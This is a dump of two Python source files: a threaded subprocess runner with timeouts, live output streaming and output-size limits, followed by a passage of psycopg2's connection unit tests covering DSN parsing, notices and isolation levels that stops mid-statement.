process.py
from typing import Any, Optional, TypedDict, Union
from ._dict import Dict
from subprocess import (Popen, PIPE, DEVNULL, TimeoutExpired,
CalledProcessError)
from tempfile import NamedTemporaryFile
from threading import Thread, Timer
from queue import Queue, Empty
import sys, time, io, asyncio, threading
from .interrupt import terminate_thread
ON_POSIX = 'posix' in sys.builtin_module_names
def _silent_interrupt(func):
def wrapper(self, *args, **kwargs):
try:
func(self, *args, **kwargs)
except KeyboardInterrupt:
pass
return
wrapper.__name__ = func.__name__
return wrapper
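# Note: this decorator wraps the reader/handler worker targets below so that,
# when _kill() injects a KeyboardInterrupt via terminate_thread(), the thread
# exits quietly instead of printing a traceback.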
class MyProcess():
'''
Tool for launching a process with support for live stdout/stderr
handling, as well as timeouts, custom input, and optional
stdout/stderr capturing.
Uses threads and queues.
Arguments:
args: arguments passed to Popen
shell: passed to Popen
input: string that simulates stdin
timeout: None or float timeout in seconds
check: bool. If true and an error occurred, raises an exception
capture_stdout: bool. If true, output is assigned to 'self.stdout'
live_stdout: None, io.BufferedWriter instance, or any object
with methods write and flush. If given, write(line) and flush()
are called for each line of stdout as soon as it is received
(as soon as the program flushes), with a maximum delay of
'micro_delay'.
timeout_stdout: None (infinity) or float. Time in seconds to
wait for the live_stdout handler after the process terminates.
Recall that the live_stdout handler may still have some
remaining lines to handle once the process finishes.
The additional time will not affect 'self.elapsed'.
max_stdout: None, int or string. If more than max_stdout bytes
are received, the process is killed. Notice that if capturing
and live_stdout are disabled, no bytes will be received at all.
Accepts string of the form '#', '#k', '#M', '#G', '#T'.
capture_stderr: (see capture_stdout)
live_stderr: (see live_stdout)
timeout_stderr: (see timeout_stdout)
max_stderr: (see max_stdout)
encoding: string used for encoding/decoding stdin/stdout/stderr
micro_delay: float seconds (see live_stdout)
block: bool. Blocks the current thread until the process finishes.
If false, you must call wait()
run() returns self and sets:
self.stdout: string, stdout of the process (if captured)
self.stderr: string, stderr of the process (if captured)
self.elapsed: float, approximate elapsed time of the process
in seconds.
self.timeout: float, copy of the timeout argument
self.error: None or string, either 'TimeoutExpired',
'ExcessOfOutput', 'KeyboardInterrupt',
'NonZeroExitCode #', or an unexpected exception as string.
self.returncode: int, exit code of the process
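Example (illustrative sketch; assumes a POSIX shell with 'echo'):
    p = MyProcess('echo hello && echo world', shell=True)
    p.run(live_stdout=sys.stdout, timeout=5.0)
    print(p.returncode, p.error, round(p.elapsed, 3))
    print(p.stdout)  # also captured, since capture_stdout defaults to True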
'''
def __init__(self, args, shell=False, env=None, cwd=None):
kwargs = locals()
kwargs.pop('self')
self.kwargs = Dict(kwargs)
def run(
self,
input: str = None,
timeout: float = None,
check: bool = False,
capture_stdout=True,
live_stdout=None,
timeout_stdout=None,
max_stdout=None,
capture_stderr=False,
live_stderr=None,
timeout_stderr=None,
max_stderr=None,
encoding='utf-8',
micro_delay=1e-3,
):
kwargs = locals()
kwargs.pop('self')
self.kwargs.update(kwargs)
self._start()
interrupt = Thread(
target=self._kill,
args=['KeyboardInterrupt'],
)
try:
# A polling loop is used instead of self._sync.wait() so that a
# terminate_thread(thread, KeyboardInterrupt) aimed at this thread
# is handled promptly.
while not self._sync.is_set():
time.sleep(1e-4)
except KeyboardInterrupt:
interrupt.start()
except Exception as e:
self._error = str(e)
while 1:
try:
self._sync.wait()
if check and self.error:
raise CalledProcessError(
returncode=self.returncode,
cmd=self.kwargs.args,
)
break
except KeyboardInterrupt:
pass
return self
async def async_run(self, input=None, timeout=None, check=False,
capture_stdout=True, live_stdout=None,
timeout_stdout=None, max_stdout=None,
capture_stderr=False, live_stderr=None,
timeout_stderr=None, max_stderr=None, encoding='utf-8',
micro_delay=1e-3):
kwargs = locals()
kwargs.pop('self')
self.kwargs.update(kwargs)
self._start()
assert self._async
await self._async.wait()
if check and self.error:
raise CalledProcessError(
returncode=self.returncode,
cmd=self.kwargs.args,
)
return self
def run_detached(
self,
input: str = None,
timeout: float = None,
check: bool = False,
capture_stdout=True,
live_stdout=None,
timeout_stdout=None,
max_stdout=None,
capture_stderr=False,
live_stderr=None,
timeout_stderr=None,
max_stderr=None,
encoding='utf-8',
micro_delay=1e-3,
):
kwargs = locals()
kwargs.pop('self')
self.kwargs.update(kwargs)
self._start()
return self
def _start(self):
self._done = False
self._stop = False
self._error = None
self._timeout = self._parse_time(self.kwargs.timeout, None)
self._micro_delay = self.kwargs.micro_delay
self._encoding = self.kwargs.encoding
self._max_stdout = self._parse_eng(self.kwargs.max_stdout)
self._max_stderr = self._parse_eng(self.kwargs.max_stderr)
self._timeout_stdout = self._parse_time(self.kwargs.timeout_stdout,
float('inf'))
self._timeout_stderr = self._parse_time(self.kwargs.timeout_stderr,
float('inf'))
self._threads = {}
self._check = self.kwargs.check
self._sync = threading.Event()
try:
self._async = asyncio.Event()
except RuntimeError:
self._async = None
self._threads['waiter'] = Thread(target=self._waiter)
if self._timeout:
self._threads['timer'] = Timer(
self._timeout,
self._kill,
args=['TimeoutExpired'],
)
config = {
'out': {
'capture': self.kwargs.capture_stdout,
'live': self.kwargs.live_stdout,
'wait': self._timeout_stdout,
'max_size': self._max_stdout,
},
'err': {
'capture': self.kwargs.capture_stderr,
'live': self.kwargs.live_stderr,
'wait': self._timeout_stderr,
'max_size': self._max_stderr,
},
}
for key, val in config.items():
piped = val['capture'] or val['live']
val['pipe'] = PIPE if piped else DEVNULL
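# Open a pipe only for streams that are actually consumed; otherwise send
# them to DEVNULL so unread output cannot fill the OS pipe buffer.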
self._start_time = time.time()
try:
self._process = Popen(
self.kwargs.args,
shell=self.kwargs.shell,
stdin=PIPE,
stdout=config['out']['pipe'],
stderr=config['err']['pipe'],
#bufsize=1,
close_fds=ON_POSIX,
env=self.kwargs.env,
cwd=self.kwargs.cwd,
)
except FileNotFoundError as e:
self._stop = True
self._done = True
self._sync.set()
if self._async:
self._async.set()
self.error = str(e)
if self.kwargs.check:
raise
return
assert self._process.stdin
if self.kwargs.input != None:
_input = self.kwargs.input.encode(self.kwargs.encoding)
self._process.stdin.write(_input)
self._process.stdin.close()
config['out']['source'] = self._process.stdout
config['err']['source'] = self._process.stderr
self._buffer_stdout = io.StringIO(
) if config['out']['capture'] else None
config['out']['buffer'] = self._buffer_stdout
self._buffer_stderr = io.StringIO(
) if config['err']['capture'] else None
config['err']['buffer'] = self._buffer_stderr
for key, val in config.items():
queues = []
h = {}
if val['capture']:
h['capture'] = dict(ostream=val['buffer'], flush=False,
wait=float('inf'))
if val['live']:
h['handler'] = dict(ostream=val['live'], flush=True,
wait=val['wait'])
for name, kwargs in h.items():
queues.append(Queue())
self._threads[f'std{key}_{name}'] = Thread(
target=self._live_handler,
args=[queues[-1]],
kwargs=kwargs,
)
if queues:
self._threads[f'{key}-main'] = Thread(
target=self._non_blocking_reader,
kwargs=dict(istream=val['source'], queues=queues,
max_size=val['max_size']))
for key, t in self._threads.items():
t.start()
return
def _waiter(self):
try:
while not self._stop:
if self._process.poll() != None:
self._stop = True
else:
time.sleep(self._micro_delay)
if self._process.stdout:
self._process.stdout.close()
if self._process.stderr:
self._process.stderr.close()
def get_value(buffer):
if buffer == None:
return None
value = buffer.getvalue()
buffer.close()
return value
self._end = time.time()
if 'timer' in self._threads:
self._threads['timer'].cancel()
self.stdout = get_value(self._buffer_stdout)
self.stderr = get_value(self._buffer_stderr)
self.elapsed = self._end - self._start_time
self.timeout = self._timeout
self.returncode = self._process.wait()
if self._error:
self.error = self._error
elif self.returncode != 0:
self.error = f'NonZeroExitCode {self.returncode}'
else:
self.error = None
for key, t in self._threads.items():
if key != 'waiter':
t.join()
finally:
self._done = True
self._sync.set()
if self._async:
self._async.set()
return
def kill(self):
self._kill('KilledByUser')
while not self._done:
time.sleep(1e-3)
return
def _kill(self, error):
if self.is_active():
self._error = error
if 'timer' in self._threads:
self._threads['timer'].cancel()
self._stop = True
self._process.kill()
for k, t in self._threads.items():
if k != 'waiter' and k != 'timer':
terminate_thread(t, KeyboardInterrupt)
for k, t in self._threads.items():
if k != 'waiter' and k != 'timer':
t.join()
@_silent_interrupt
def _non_blocking_reader(self, istream, queues, max_size):
#https://stackoverflow.com/a/4896288/3671939
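# Reading lines in a dedicated thread and fanning them out to queues keeps
# the caller responsive: readline() blocks until a full line or EOF, and
# there is no portable non-blocking read on pipes.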
for line in iter(istream.readline, b''):
max_size -= len(line)
if max_size < 0:
self._stop = True
self._error = 'ExcessOfOutput'
if self._stop:
break
line = line.decode(self._encoding)
for q in queues:
q.put(line)
return istream.close()
@_silent_interrupt
def _live_handler(self, queue, ostream, flush, wait):
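# Drains the queue and writes each line to ostream. After the process has
# stopped, keeps draining for up to 'wait' extra seconds so lines still
# buffered by the reader thread are not lost.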
waiting = False
waiting_start = None
while not self._stop or waiting:
try:
elem = queue.get(timeout=self._micro_delay)
except Empty:
waiting = False
else:
ostream.write(elem)
if flush:
ostream.flush()
if self._stop:
if waiting_start == None:
waiting_start = time.time()
waiting = True
if time.time() - waiting_start > wait:
waiting = False
return
def _parse_eng(self, x):
units = {'k': 1e3, 'M': 1e6, 'G': 1e9, 'T': 1e12}
if x == None:
return float('inf')
elif isinstance(x, int):
return x
elif isinstance(x, float):
return round(x)
elif x.isdigit():
return int(x)
else:
return int(x[:-1]) * int(units[x[-1]])
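# Illustration of the parsing above: _parse_eng(None) -> inf,
# _parse_eng('500') -> 500, _parse_eng('1k') -> 1000, _parse_eng('2M') -> 2000000.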
def _parse_time(self, x, ifNone):
return ifNone if x == None else x
def is_active(self):
return self._done == False
class Tee(io.BufferedWriter):
"""
Simple BufferedWriter that broadcasts
data to multiple BufferedWriters
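Example (illustrative sketch; assumes the MyProcess class above):
    buf = io.StringIO()
    MyProcess('echo hi', shell=True).run(live_stdout=Tee(sys.stdout, buf))
    # every line is written both to the real stdout and to 'buf'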
"""
def __init__(self, *outputs):
self.outputs = outputs
def write(self, s):
for out in self.outputs:
out.write(s)
def flush(self):
for out in self.outputs:
out.flush()
class CustomOStream(io.BufferedWriter):
def __init__(self, write_function, flush_function=None):
self.write = write_function
self.flush = flush_function or (lambda: 0) # type:ignore
self.tmp = NamedTemporaryFile('r', suffix='.out')
self.fileno = self.tmp.fileno # Provide a dummy fileno
def __del__(self):
self.tmp.close()  # object defines no __del__, so there is nothing to chain to
class TemporaryStdout(io.RawIOBase):
'''
Replace stdout temporarily with another stream
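Example (illustrative sketch; 'Collector' is an assumed subclass):
    class Collector(TemporaryStdout):
        chunks = []
        def write(self, s):
            self.chunks.append(s)
    with Collector():
        print('captured')  # appended to Collector.chunks instead of the real stdout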
'''
def __enter__(self):
self.prev = sys.stdout
sys.stdout = self
def __exit__(self, *args):
sys.stdout = self.prev
def test():
# Testing mode
cmd1 = ' && '.join(f'sleep 0.25 && echo "{i} "' for i in range(4))
cmd2 = "python3 -c 'import time; [print(i, flush=True) or time.sleep(0.25) for i in range(4)] ; print(input().upper());'"
cmd3 = "python3 -c 'import time; [print(i, flush=True) or time.sleep(0.25) for i in range(4)] ; print(input().upper()); exit(1)'"
cmd4 = "python3 -c 'for i in range(10**6): print(str(0)*i, flush=True)'"
class TmpWriter:
def write(self, s):
print(s, end='', flush=True) or time.sleep(0.6)
tests = [
{
'title': 'No live printing, no error and capture stdout',
'cmd': cmd1,
'kwargs': dict(
shell=True,
timeout=None,
capture_stdout=True,
)
},
{
'title':
'Print 1..4 (live), no error and capture stdout',
'cmd':
cmd1,
'kwargs':
dict(
shell=True,
timeout=1.1,
live_stdout=sys.stdout,
capture_stdout=True,
)
},
{
'title':
'Print 1..4 (live), no error and do not capture stdout',
'cmd':
cmd1,
'kwargs':
dict(
shell=True,
timeout=1.1,
live_stdout=sys.stdout,
capture_stdout=False,
)
},
{
'title':
'Print 1..? (live), Timeout error, capture stdout',
'cmd':
cmd1,
'kwargs':
dict(
shell=True,
timeout=0.6,
live_stdout=sys.stdout,
capture_stdout=True,
)
},
{
'title':
'Live printing, Timeout error, no capture, wait for handler',
'cmd':
cmd2,
'kwargs':
dict(
shell=True,
timeout=0.6,
live_stdout=TmpWriter(),
#wait_live_stdout=False,
capture_stdout=False,
)
},
{
'title': 'Live printing, Excess of Output',
'cmd': cmd4,
'kwargs': dict(
shell=True,
live_stdout=sys.stdout,
max_stdout='1k',
)
},
]
for i, test in enumerate(tests):
print('-' * 10, f'TEST {i+1}', '-' * 10)
print(test['title'])
p = MyProcess(
test['cmd'],
shell=test['kwargs'].pop('shell', False),
)
p.run(**test['kwargs'])
print('Elapsed:', p.elapsed)
print('Error:', p.error)
print('Stdout:', p.stdout)
exit(0) # Required for some reason
test_connection.py
#!/usr/bin/env python
# test_connection.py - unit test for connection attributes
#
# Copyright (C) 2008-2011 James Henstridge <james@jamesh.id.au>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import re
import os
import sys
import time
import threading
import subprocess as sp
from operator import attrgetter
import psycopg2
import psycopg2.errorcodes
from psycopg2 import extensions as ext
from .testutils import (
script_to_py3,
unittest,
decorate_all_tests,
skip_if_no_superuser,
skip_before_postgres,
skip_after_postgres,
skip_before_libpq,
ConnectingTestCase,
skip_if_tpc_disabled,
skip_if_windows,
slow,
)
from .testconfig import dsn, dbname
class ConnectionTests(ConnectingTestCase):
def test_closed_attribute(self):
conn = self.conn
self.assertEqual(conn.closed, False)
conn.close()
self.assertEqual(conn.closed, True)
def test_close_idempotent(self):
conn = self.conn
conn.close()
conn.close()
self.assertTrue(conn.closed)
def test_cursor_closed_attribute(self):
conn = self.conn
curs = conn.cursor()
self.assertEqual(curs.closed, False)
curs.close()
self.assertEqual(curs.closed, True)
# Closing the connection closes the cursor:
curs = conn.cursor()
conn.close()
self.assertEqual(curs.closed, True)
@skip_before_postgres(8, 4)
@skip_if_no_superuser
@skip_if_windows
def test_cleanup_on_badconn_close(self):
# ticket #148
conn = self.conn
cur = conn.cursor()
self.assertRaises(
psycopg2.OperationalError,
cur.execute,
"select pg_terminate_backend(pg_backend_pid())",
)
self.assertEqual(conn.closed, 2)
conn.close()
self.assertEqual(conn.closed, 1)
def test_reset(self):
conn = self.conn
# switch session characteristics
conn.autocommit = True
conn.isolation_level = "serializable"
conn.readonly = True
if self.conn.server_version >= 90100:
conn.deferrable = False
self.assertTrue(conn.autocommit)
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
self.assertTrue(conn.readonly is True)
if self.conn.server_version >= 90100:
self.assertTrue(conn.deferrable is False)
conn.reset()
# now the session characteristics should be reverted
self.assertTrue(not conn.autocommit)
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_DEFAULT)
self.assertTrue(conn.readonly is None)
if self.conn.server_version >= 90100:
self.assertTrue(conn.deferrable is None)
def test_notices(self):
conn = self.conn
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
cur.execute("create temp table chatty (id serial primary key);")
self.assertEqual("CREATE TABLE", cur.statusmessage)
self.assertTrue(conn.notices)
def test_notices_consistent_order(self):
conn = self.conn
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
cur.execute(
"""
create temp table table1 (id serial);
create temp table table2 (id serial);
"""
)
cur.execute(
"""
create temp table table3 (id serial);
create temp table table4 (id serial);
"""
)
self.assertEqual(4, len(conn.notices))
self.assertTrue("table1" in conn.notices[0])
self.assertTrue("table2" in conn.notices[1])
self.assertTrue("table3" in conn.notices[2])
self.assertTrue("table4" in conn.notices[3])
@slow
def test_notices_limited(self):
conn = self.conn
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
for i in range(0, 100, 10):
sql = " ".join(
["create temp table table%d (id serial);" % j for j in range(i, i + 10)]
)
cur.execute(sql)
self.assertEqual(50, len(conn.notices))
self.assertTrue("table99" in conn.notices[-1], conn.notices[-1])
@slow
def test_notices_deque(self):
from collections import deque
conn = self.conn
self.conn.notices = deque()
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
cur.execute(
"""
create temp table table1 (id serial);
create temp table table2 (id serial);
"""
)
cur.execute(
"""
create temp table table3 (id serial);
create temp table table4 (id serial);"""
)
self.assertEqual(len(conn.notices), 4)
self.assertTrue("table1" in conn.notices.popleft())
self.assertTrue("table2" in conn.notices.popleft())
self.assertTrue("table3" in conn.notices.popleft())
self.assertTrue("table4" in conn.notices.popleft())
self.assertEqual(len(conn.notices), 0)
# not limited, but no error
for i in range(0, 100, 10):
sql = " ".join(
[
"create temp table table2_%d (id serial);" % j
for j in range(i, i + 10)
]
)
cur.execute(sql)
self.assertEqual(len([n for n in conn.notices if "CREATE TABLE" in n]), 100)
def test_notices_noappend(self):
conn = self.conn
self.conn.notices = None # errors appending notices are silently swallowed
cur = conn.cursor()
if self.conn.server_version >= 90300:
cur.execute("set client_min_messages=debug1")
cur.execute("create temp table table1 (id serial);")
self.assertEqual(self.conn.notices, None)
def test_server_version(self):
self.assertTrue(self.conn.server_version)
def test_protocol_version(self):
self.assertTrue(
self.conn.protocol_version in (2, 3), self.conn.protocol_version
)
def test_tpc_unsupported(self):
cnn = self.conn
if cnn.server_version >= 80100:
return self.skipTest("tpc is supported")
self.assertRaises(psycopg2.NotSupportedError, cnn.xid, 42, "foo", "bar")
@slow
@skip_before_postgres(8, 2)
def test_concurrent_execution(self):
def slave():
cnn = self.connect()
cur = cnn.cursor()
cur.execute("select pg_sleep(4)")
cur.close()
cnn.close()
t1 = threading.Thread(target=slave)
t2 = threading.Thread(target=slave)
t0 = time.time()
t1.start()
t2.start()
t1.join()
t2.join()
self.assertTrue(time.time() - t0 < 7, "something broken in concurrency")
def test_encoding_name(self):
self.conn.set_client_encoding("EUC_JP")
# conn.encoding is 'EUCJP' now.
cur = self.conn.cursor()
ext.register_type(ext.UNICODE, cur)
cur.execute("select 'foo'::text;")
self.assertEqual(cur.fetchone()[0], "foo")
def test_connect_nonnormal_envvar(self):
# We must perform encoding normalization at connection time
self.conn.close()
oldenc = os.environ.get("PGCLIENTENCODING")
os.environ["PGCLIENTENCODING"] = "utf-8" # malformed spelling
try:
self.conn = self.connect()
finally:
if oldenc is not None:
os.environ["PGCLIENTENCODING"] = oldenc
else:
del os.environ["PGCLIENTENCODING"]
def test_connect_no_string(self):
class MyString(str):
pass
conn = psycopg2.connect(MyString(dsn))
conn.close()
def test_weakref(self):
from weakref import ref
import gc
conn = psycopg2.connect(dsn)
w = ref(conn)
conn.close()
del conn
gc.collect()
self.assertTrue(w() is None)
@slow
def test_commit_concurrency(self):
# The problem is the one reported in ticket #103. Because of bad
# status check, we commit even when a commit is already on its way.
# We can detect this condition by the warnings.
conn = self.conn
notices = []
stop = []
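# 'stop' is a plain list used as a mutable flag shared with the committer
# thread: appending any element makes it truthy and ends the loop below.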
def committer():
while not stop:
conn.commit()
while conn.notices:
notices.append((2, conn.notices.pop()))
cur = conn.cursor()
t1 = threading.Thread(target=committer)
t1.start()
i = 1
for i in range(1000):
cur.execute("select %s;", (i,))
conn.commit()
while conn.notices:
notices.append((1, conn.notices.pop()))
# Stop the committer thread
stop.append(True)
self.assertTrue(not notices, "%d notices raised" % len(notices))
def test_connect_cursor_factory(self):
import psycopg2.extras
conn = self.connect(cursor_factory=psycopg2.extras.DictCursor)
cur = conn.cursor()
cur.execute("select 1 as a")
self.assertEqual(cur.fetchone()["a"], 1)
def test_cursor_factory(self):
self.assertEqual(self.conn.cursor_factory, None)
cur = self.conn.cursor()
cur.execute("select 1 as a")
self.assertRaises(TypeError, (lambda r: r["a"]), cur.fetchone())
self.conn.cursor_factory = psycopg2.extras.DictCursor
self.assertEqual(self.conn.cursor_factory, psycopg2.extras.DictCursor)
cur = self.conn.cursor()
cur.execute("select 1 as a")
self.assertEqual(cur.fetchone()["a"], 1)
self.conn.cursor_factory = None
self.assertEqual(self.conn.cursor_factory, None)
cur = self.conn.cursor()
cur.execute("select 1 as a")
self.assertRaises(TypeError, (lambda r: r["a"]), cur.fetchone())
def test_cursor_factory_none(self):
# issue #210
conn = self.connect()
cur = conn.cursor(cursor_factory=None)
self.assertEqual(type(cur), ext.cursor)
conn = self.connect(cursor_factory=psycopg2.extras.DictCursor)
cur = conn.cursor(cursor_factory=None)
self.assertEqual(type(cur), psycopg2.extras.DictCursor)
def test_failed_init_status(self):
class SubConnection(ext.connection):
def __init__(self, dsn):
try:
super(SubConnection, self).__init__(dsn)
except Exception:
pass
c = SubConnection("dbname=thereisnosuchdatabasemate password=foobar")
self.assertTrue(c.closed, "connection failed so it must be closed")
self.assertTrue("foobar" not in c.dsn, "password was not obscured")
class ParseDsnTestCase(ConnectingTestCase):
def test_parse_dsn(self):
from psycopg2 import ProgrammingError
self.assertEqual(
ext.parse_dsn("dbname=test user=tester password=secret"),
dict(user="tester", password="secret", dbname="test"),
"simple DSN parsed",
)
self.assertRaises(
ProgrammingError, ext.parse_dsn, "dbname=test 2 user=tester password=secret"
)
self.assertEqual(
ext.parse_dsn("dbname='test 2' user=tester password=secret"),
dict(user="tester", password="secret", dbname="test 2"),
"DSN with quoting parsed",
)
# Can't really use assertRaisesRegexp() here since we need to
# make sure that secret is *not* exposed in the error message
# (and it also requires python >= 2.7).
raised = False
try:
# unterminated quote after dbname:
ext.parse_dsn("dbname='test 2 user=tester password=secret")
except ProgrammingError as e:
raised = True
self.assertTrue(
str(e).find("secret") < 0, "DSN was not exposed in error message"
)
except Exception as e:
self.fail("unexpected error condition: " + repr(e))
self.assertTrue(raised, "ProgrammingError raised due to invalid DSN")
@skip_before_libpq(9, 2)
def test_parse_dsn_uri(self):
self.assertEqual(
ext.parse_dsn("postgresql://tester:secret@/test"),
dict(user="tester", password="secret", dbname="test"),
"valid URI dsn parsed",
)
raised = False
try:
# extra '=' after port value
ext.parse_dsn(dsn="postgresql://tester:secret@/test?port=1111=x")
except psycopg2.ProgrammingError as e:
raised = True
self.assertTrue(
str(e).find("secret") < 0, "URI was not exposed in error message"
)
except Exception as e:
self.fail("unexpected error condition: " + repr(e))
self.assertTrue(raised, "ProgrammingError raised due to invalid URI")
def test_unicode_value(self):
snowman = "\u2603"
d = ext.parse_dsn("dbname=" + snowman)
if sys.version_info[0] < 3:
self.assertEqual(d["dbname"], snowman.encode("utf8"))
else:
self.assertEqual(d["dbname"], snowman)
def test_unicode_key(self):
snowman = "\u2603"
self.assertRaises(
psycopg2.ProgrammingError, ext.parse_dsn, snowman + "=" + snowman
)
def test_bad_param(self):
self.assertRaises(TypeError, ext.parse_dsn, None)
self.assertRaises(TypeError, ext.parse_dsn, 42)
def test_str_subclass(self):
class MyString(str):
pass
res = ext.parse_dsn(MyString("dbname=test"))
self.assertEqual(res, {"dbname": "test"})
class MakeDsnTestCase(ConnectingTestCase):
def test_empty_arguments(self):
self.assertEqual(ext.make_dsn(), "")
def test_empty_string(self):
dsn = ext.make_dsn("")
self.assertEqual(dsn, "")
def test_params_validation(self):
self.assertRaises(psycopg2.ProgrammingError, ext.make_dsn, "dbnamo=a")
self.assertRaises(psycopg2.ProgrammingError, ext.make_dsn, dbnamo="a")
self.assertRaises(
psycopg2.ProgrammingError, ext.make_dsn, "dbname=a", nosuchparam="b"
)
def test_empty_param(self):
dsn = ext.make_dsn(dbname="sony", password="")
self.assertDsnEqual(dsn, "dbname=sony password=''")
def test_escape(self):
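# libpq connection-string quoting, as exercised below: values containing
# whitespace are wrapped in single quotes, while backslashes and single
# quotes are escaped with a backslash.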
dsn = ext.make_dsn(dbname="hello world")
self.assertEqual(dsn, "dbname='hello world'")
dsn = ext.make_dsn(dbname=r"back\slash")
self.assertEqual(dsn, r"dbname=back\\slash")
dsn = ext.make_dsn(dbname="quo'te")
self.assertEqual(dsn, r"dbname=quo\'te")
dsn = ext.make_dsn(dbname="with\ttab")
self.assertEqual(dsn, "dbname='with\ttab'")
dsn = ext.make_dsn(dbname=r"\every thing'")
self.assertEqual(dsn, r"dbname='\\every thing\''")
def test_database_is_a_keyword(self):
self.assertEqual(ext.make_dsn(database="sigh"), "dbname=sigh")
def test_params_merging(self):
dsn = ext.make_dsn("dbname=foo host=bar", host="baz")
self.assertDsnEqual(dsn, "dbname=foo host=baz")
dsn = ext.make_dsn("dbname=foo", user="postgres")
self.assertDsnEqual(dsn, "dbname=foo user=postgres")
def test_no_dsn_munging(self):
dsnin = "dbname=a host=b user=c password=d"
dsn = ext.make_dsn(dsnin)
self.assertEqual(dsn, dsnin)
def test_null_args(self):
dsn = ext.make_dsn("dbname=foo", user="bar", password=None)
self.assertDsnEqual(dsn, "dbname=foo user=bar")
@skip_before_libpq(9, 2)
def test_url_is_cool(self):
url = "postgresql://tester:secret@/test?application_name=wat"
dsn = ext.make_dsn(url)
self.assertEqual(dsn, url)
dsn = ext.make_dsn(url, application_name="woot")
self.assertDsnEqual(
dsn, "dbname=test user=tester password=secret application_name=woot"
)
self.assertRaises(
psycopg2.ProgrammingError,
ext.make_dsn,
"postgresql://tester:secret@/test?nosuch=param",
)
self.assertRaises(psycopg2.ProgrammingError, ext.make_dsn, url, nosuch="param")
@skip_before_libpq(9, 3)
def test_get_dsn_parameters(self):
conn = self.connect()
d = conn.get_dsn_parameters()
self.assertEqual(d["dbname"], dbname) # the only param we can check reliably
self.assertTrue("password" not in d, d)
class IsolationLevelsTestCase(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
conn = self.connect()
cur = conn.cursor()
try:
cur.execute("drop table isolevel;")
except psycopg2.ProgrammingError:
conn.rollback()
cur.execute("create table isolevel (id integer);")
conn.commit()
conn.close()
def test_isolation_level(self):
conn = self.connect()
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_DEFAULT)
def test_encoding(self):
conn = self.connect()
self.assertTrue(conn.encoding in ext.encodings)
def test_set_isolation_level(self):
conn = self.connect()
curs = conn.cursor()
levels = [
("read uncommitted", ext.ISOLATION_LEVEL_READ_UNCOMMITTED),
("read committed", ext.ISOLATION_LEVEL_READ_COMMITTED),
("repeatable read", ext.ISOLATION_LEVEL_REPEATABLE_READ),
("serializable", ext.ISOLATION_LEVEL_SERIALIZABLE),
]
for name, level in levels:
conn.set_isolation_level(level)
# the only values available on prehistoric PG versions
if conn.server_version < 80000:
if level in (
ext.ISOLATION_LEVEL_READ_UNCOMMITTED,
ext.ISOLATION_LEVEL_REPEATABLE_READ,
):
name, level = levels[levels.index((name, level)) + 1]
self.assertEqual(conn.isolation_level, level)
curs.execute("show transaction_isolation;")
got_name = curs.fetchone()[0]
self.assertEqual(name, got_name)
conn.commit()
self.assertRaises(ValueError, conn.set_isolation_level, -1)
self.assertRaises(ValueError, conn.set_isolation_level, 5)
def test_set_isolation_level_autocommit(self):
conn = self.connect()
curs = conn.cursor()
conn.set_isolation_level(ext.ISOLATION_LEVEL_AUTOCOMMIT)
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_DEFAULT)
self.assertTrue(conn.autocommit)
conn.isolation_level = "serializable"
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
self.assertTrue(conn.autocommit)
curs.execute("show transaction_isolation;")
self.assertEqual(curs.fetchone()[0], "serializable")
def test_set_isolation_level_default(self):
conn = self.connect()
curs = conn.cursor()
conn.autocommit = True
curs.execute("set default_transaction_isolation to 'read committed'")
conn.autocommit = False
conn.set_isolation_level(ext.ISOLATION_LEVEL_SERIALIZABLE)
self.assertEqual(conn.isolation_level, ext.ISOLATION_LEVEL_SERIALIZABLE)
curs.execute("show transaction_isolation")
self.assertEqual(curs.fetchone()[0], "serializable")
conn.rollback()
conn.set_isolation_level(ext.ISOLATION_LEVEL_DEFAULT)
curs.execute("show transaction_isolation")
self.assertEqual(curs.fetchone()[0], "read committed")
def test_set_isolation_level_abort(self):
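# Switching the isolation level while a transaction is in progress discards
# it: the status drops back to IDLE and the pending insert is rolled back.
# Under autocommit the insert takes effect immediately, so only that last
# row survives (final count is 1).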
conn = self.connect()
cur = conn.cursor()
self.assertEqual(ext.TRANSACTION_STATUS_IDLE, conn.get_transaction_status())
cur.execute("insert into isolevel values (10);")
self.assertEqual(ext.TRANSACTION_STATUS_INTRANS, conn.get_transaction_status())
conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_SERIALIZABLE)
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_IDLE, conn.get_transaction_status()
)
cur.execute("select count(*) from isolevel;")
self.assertEqual(0, cur.fetchone()[0])
cur.execute("insert into isolevel values (10);")
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_INTRANS,
conn.get_transaction_status(),
)
conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_IDLE, conn.get_transaction_status()
)
cur.execute("select count(*) from isolevel;")
self.assertEqual(0, cur.fetchone()[0])
cur.execute("insert into isolevel values (10);")
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_IDLE, conn.get_transaction_status()
)
conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_READ_COMMITTED)
self.assertEqual(
psycopg2.extensions.TRANSACTION_STATUS_IDLE, conn.get_transaction_status()
)
cur.execute("select count(*) from isolevel;")
self.assertEqual(1, cur.fetchone()[0])
self.assertEqual(
